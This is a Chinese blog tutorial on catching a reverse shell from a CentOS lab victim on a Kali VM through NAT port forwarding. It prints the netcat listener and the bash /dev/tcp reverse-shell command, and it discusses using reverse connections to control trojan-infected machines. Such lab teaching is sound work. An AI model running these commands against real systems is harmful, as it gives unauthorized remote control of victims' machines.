如何用内网虚拟机kali实现反弹shell

已于 2023-04-04 15:55:27 修改
阅读量8.7k 收藏 36
点赞数 5
文章标签: 网络安全 CTF 反弹shell
于 2020-05-23 23:44:07 首次发布
https://blog.csdn.net/qq_44657899
本文链接:https://blog.csdn.net/qq_44657899/article/details/106307545
版权

注:前提是宿主机能被外网访问到(有个公网ip),原理是端口转发。或者用来反弹宿主机所在局域网的机器。所以最好还是买个有外网ip的服务器。

文章目录

这里我讲述的是NAT模式下的反弹shell,因为个人感觉NAT模式方便一点。

实验环境

  • 攻击机:kali虚拟机(位于内网)
    ip:192.168.77.128
    在这里插入图片描述

  • 宿主机:win10
    ip:10.8.163.224
    在这里插入图片描述

  • 受害端:centos-7

设置端口转发

虚拟机集群此时相当于在内网中,而要实现反弹shell,我们的受害端centos7必须要能够连接我们的虚拟机kali。可以通过端口转发的功能来实现,比如我把kali虚拟机的2333号端口映射到主机的6666号端口,这样外网其它机器只需访问宿主机的6666号端口即可连接宿主机的虚拟机了。

下面是设置步骤:

编辑→虚拟网络编辑器→NAT设置→添加

在这里插入图片描述在这里插入图片描述

反弹shell

然后把攻击机kali的端口监听打开

nc -lvp 2333

在这里插入图片描述

用受害机centos7生成一个反弹shell,连接宿主机的公网IP10.8.163.224/6666,这样通过端口转发,就会连接到kali虚拟机上。

bash -i >& /dev/tcp/10.8.163.224/6666 0>&1

在这里插入图片描述

我们可以看到kali已经获取到受害机的bash。
在这里插入图片描述

验证

我们用kali在受害机桌面上创建一个hello.txt看看shell生效没。

touch /root/桌面/hello.txt

在这里插入图片描述在这里插入图片描述

为什么要反弹shell?

反弹很好理解,攻击者指定服务端,受害者主机主动连接攻击者的服务端程序,就叫反弹连接。通常用于被控端因防火墙受限、权限不足、端口被占用等情形。

什么情况下正向连接不能用?

有如下情况:

  • 某客户机中了你的网马,但是它在局域网内,你直接连接不了。

  • 目标机器的ip动态改变,你不能持续控制。

  • 防火墙等限制,对方机器只能发送请求,不能接收请求。

  • 对于病毒,木马,受害者什么时候能中招,对方的网络环境是什么样的,什么时候开关机等情况都是未知的,所以建立一个服务端让恶意程序主动连接,才是上策。

天问_Herbert555
关注
  • 5
    点赞
  • 36
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
内网kali映射到公网实现访问
afei001
11-01 3536
实验工具 GateOne ngrok 实验目的     将内网中web端的kali映射到公网,通过公网访问特定的域名就能登录到内网中的kali 1.GateOne简介      GateOne是一款使用HTML5技术编写的网页版 SSH 终端模拟器。基于现代的HTML5 技术,无需任何浏览器插件、支持多个SSH 进程、可以嵌入到其他任意应用程序中、支持使用 JavaScript、Python甚至...
Kali Linux-虚拟机安装
01-09
流程需求    (1)VM虚拟机:VMware Workstation 15.5        (2)Kali系统镜像 https://www.kali.org/   虚拟机配置部分 1.打开VMware Workstation,点击创建新的虚拟机。 2.选择“经典”,点击下一步。  3.选择“安装程序光盘映像文件(iso)”。 4.客户机操作系统选择“Linux”和“Debian 10.x 64位”。 5.命名虚拟机和选择虚拟机存放磁盘位置。 6.配置磁盘容量(建议20GB以上),存储方式选择单文件,可以提高磁盘性能。 7.点击“自定义硬件”。 8.分配内存,定义处理器(根据自
【安全知识】——LInux的shell反弹姿势合集(更新中)
Demo不是emo的博客
05-17 5584
当我们拿到一台LINUX主机的权限时,往往都需要反弹到公网的服务器上,一般我们使用bash来反弹的情况居多,但是bash也有失灵的时候。在这种情况下,我们可以尝试使用其他的反弹语句来达到我们的目的。
最新版Kali虚拟机安装和汉化中文教程(适合新手)
weixin_72543266的博客
03-10 1164
Kali虚拟机是一款基于Debian的Linux发行版虚拟机操作系统,专为安全渗透测试和数字取证而设计。该虚拟机预装了许多渗透测试软件,包括Metasploit、BurpSuite、sqlmap、nmap以及Cobalt Strike等,这些工具都是为了进行网络安全测试攻击而专门设计的。Kali虚拟机的好处在于,它内置了大量的安全渗透方面的软件,新手可以免于配置,开箱即用。总体来说是对自己在学习过程中,自己独立解决问题和解决本次的最新kali工具的配置使用,虽然自己也是很久没用过了
Kali使用Metasploit内、外网渗透windows系统
热门推荐
QQ670663的博客
02-17 2万+
Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。 一、(内网渗透)内网英文缩写WAN;内网又称局域网 局域网的覆盖范围一般是方圆几千米之内,其具备的安装便捷、成本节约、扩展方便等特点使其在各类办公室内运用广泛。局域网可以实现文件管理、应用软件共享、打印机共享等功能,在使用过程当中,通过维护局域网网...
域渗透(二)-内网隧道与端口转发技术
黑白的博客
05-01 4912
对于我们的环境而言,kali是桥接,首先只能访问桥接的win2016和centos7-2,所以我们跟kali通信的大多是使用win2016的,这里毕竟是模拟环境,我们就会假设win2016这台windows已经被拿下了,所以很多木马都是直接放到win2016上的,这些操作跟域相关的知识关系还不是很大,基本都是拿下第一台服务器后的一些操作,所以用到kali和win2016比较多,我们的环境是建立在vmware的三种网络模式上,去模拟各种环境。
Linux常用的反弹shell命令
m0_63200360的博客
04-24 2210
什么是反弹shell反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。为什么要反弹shell?通常用于被控端因防火墙受限、权限不足、端口被占用等情形。举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。
带你了解LINUX反弹Shell的各种姿势(超详细)
xf555er的博客
11-27 1596
LInux反弹Shell(Reveser Shell), 也可以称为反向Shell, 由被控制端主动向控制端发送请求建立通讯, 随后将执行命令的结果输出到控制端, 本质上是网络概念的客户端与服务端的角色反转本篇文章介绍LINUX反弹Shell的多种姿势, 在真实的渗透环境中, 根据客户端存在哪些命令的实际情况, 来采取相应的反弹shell姿势。
linux反弹shell
arissa666的博客
11-27 579
下面是windows主机找到nc打开1.bat输入:nc 连接的IP地址 端口受害主机是nc -lvvp 端口 -t -e /bin/bashkali系统连接。
Kali使用Metapsloit渗透win10 生成 payload 反弹shell
weixin_45908624的博客
07-19 2184
windows payload 反弹shell
让 WSL2 中的 Kali 虚拟机使用无线网卡
01-06
以接入 Windows 的 USB 设备加载无线网卡驱动,用 wifite 测试网卡破解功能备份 Kali 虚拟机,直接在其他机器上使用后记 为什么有这个项目   最近在研究破解 WiFi 密码,由于有了新的 WPA3 安全标准,因此,也产生...
win环境下虚拟机创建及kali的安装
08-02
在win环境在怎么安装VM,创建虚拟机,以及kali的安装方法和安装步骤图示
Kali Linux Vmware虚拟机安装(图文详解)
01-10
准备工作: 1.安装VMware workstation 软件 ...4.重命名虚拟机名称,点击浏览选择虚拟机保存的位置(此项可以在虚拟机任务栏编辑中的首选项里面设置默认保存位置,以方便下次建立虚拟机的时候直接默认,最好可以分一
VMware kali虚拟机环境配置方法
09-29
主要介绍了VMware kali虚拟机环境配置方法,本文给大家介绍的非常详细,具有一定的参考借鉴价值,需要的朋友可以参考下
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8190
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
node-v9.6.0-x86.msi
04-29
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
Python基于机器学习的分布式系统故障诊断系统源代码,分布式系统的故障数据进行分析,设计故障诊断模型,高效地分析并识别故障类别
04-29
基于技术手段(包括但不限于机器学习、深度学习等技术)对分布式系统的故障数据进行分析,设计故障诊断模型,高效地分析并识别故障类别,实现分布式系统故障运维的智能化,快速恢复故障的同时大大降低分布式系统运维工作的难度,减少运维对人力资源的消耗。在分布式系统中某个节点发生故障时,故障会沿着分布式系统的拓扑结构进行传播,造成自身节点及其邻接节点相关的KPI指标和发生大量日志异常
JavaScript前端开发的核心语言前端开发的核心语言
最新发布
04-29
javascript 当今互联网时代,JavaScript已经成为了前端开发的核心语言它是一种高级程序设计语言,通常用于网页的交互和动态效果的实现。JavaScript的灵活性以及广泛的使用使得它变得异常重要,能够为用户带来更好的用户体验。 JavaScript的特点之一是它的轻量级,它可以在网页中运行无需单独的编译或下载。这意味着网页可以更快地加载并且用户无需安装额外的软件才能运行网页上的JavaScript代码。此外,与HTML和CSS紧密结合,可以直接在HTML文档中嵌入,使得网页的开发变得非常便捷。 JavaScript具有动态性,它可以在浏览器中实时修改页面内容和样。它可以通过操作DOM(文档对象模型来动态地修改网页的结构和布局,并且可以根据用户的行为实时地响应各种事件,如点击、标悬停、滚动等。这使得开发者可以轻松地为网页添加交互性和动态效果,提供更好的用户体验。 JavaScript也是一种面向对象的语言。它支持对象、类、继承、多态等面向对象编程的概念,使得代码结构更加清晰和可维护。开发者可以创建自定义的对象和方法,对功能进行封装和复用,提高代码的可读性和可维护性。
公网实现反弹shell
07-27
公网实现反弹shell的方法有多种。具体要选择哪种方法取决于目标主机的环境和可用工具。如果目标主机上安装有netcat,可以利用netcat反弹shell。如果具有python环境,可以利用python反弹shell。如果具有php环境,可以利用php反弹shell。另外,还可以使用其他工具和技术来实现反弹shell。 举个例子,如果你想在受害机CentOS 7上生成一个反弹shell,连接到宿主机的公网IP地址为10.8.163.224,端口为6666,可以使用以下命令实现端口转发,从而连接到Kali虚拟机上: bash -i >& /dev/tcp/10.8.163.224/6666 0>&1 \[2\] 另外,如果你想利用netcat来实现反弹shell,可以使用Netcat工具。Netcat是一款简单的Unix工具,使用UDP和TCP协议。它可以作为后台操作工具,也可以用作网络测试工具或黑客工具。通过使用Netcat,你可以轻松地建立任何连接。\[3\] 需要注意的是,反弹shell是一种潜在的安全风险,应该谨慎使用,并且仅在合法和授权的情况下使用。 #### 引用[.reference_title] - *1* *3* [反弹shell总结](https://blog.csdn.net/weixin_51692662/article/details/127795576)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [如何用内网虚拟机kali实现反弹shell](https://blog.csdn.net/qq_44657899/article/details/106307545)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值